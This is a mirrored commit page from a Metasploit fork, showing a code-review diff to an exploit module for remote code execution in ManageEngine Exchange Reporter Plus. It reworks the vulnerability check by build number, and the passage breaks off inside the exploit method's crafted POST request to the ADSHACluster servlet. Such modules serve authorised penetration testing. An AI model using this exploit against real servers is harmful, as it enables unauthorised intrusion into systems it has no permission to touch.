infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Code review changes 

Use target_uri, split url inside normalize function, replace print with vprint, return CheckCode::Appears
GSoC/Meterpreter_Web_Console
Kacper Szurek 2018-07-12 14:27:28 +02:00
parent 2196640de4
commit 486225c2a8
No known key found for this signature in database
GPG Key ID: B2948EE8A0E07D2A
1 changed files with 27 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
modules/exploits/windows/http/manageengine_adshacluster_rce.rb
View File

@ -46,39 +46,41 @@ class MetasploitModule < Msf::Exploit::Remote
def check def check
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/GetProductVersion') 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
}) })
if res && res.code == 200 unless res
begin vprint_error 'Connection failed'
json = res.get_json_document return CheckCode::Safe
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
return Exploit::CheckCode::Unknown
end
if json.empty? || !json['BUILD_NUMBER']
print_error("Wrong server response")
return Exploit::CheckCode::Unknown
end
print_status "Version: #{json['BUILD_NUMBER']}"
if json['BUILD_NUMBER'].to_i <= 5310
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
else
Exploit::CheckCode::Unknown
end end
unless res.code == 200
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
begin
json = res.get_json_document
raise if json.empty? || !json['BUILD_NUMBER']
rescue
vprint_status 'Target is not Manage Engine Exchange Reporter Plus'
return CheckCode::Safe
end
vprint_status "Version: #{json['BUILD_NUMBER']}"
if json['BUILD_NUMBER'].to_i <= 5310
return CheckCode::Appears
end
CheckCode::Safe
end end
def exploit def exploit
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], '/exchange/servlet/ADSHACluster'), 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
'vars_post' => { 'vars_post' => {
'MTCALL' => "nativeClient", 'MTCALL' => "nativeClient",
'BCP_RLL' => "0102", 'BCP_RLL' => "0102",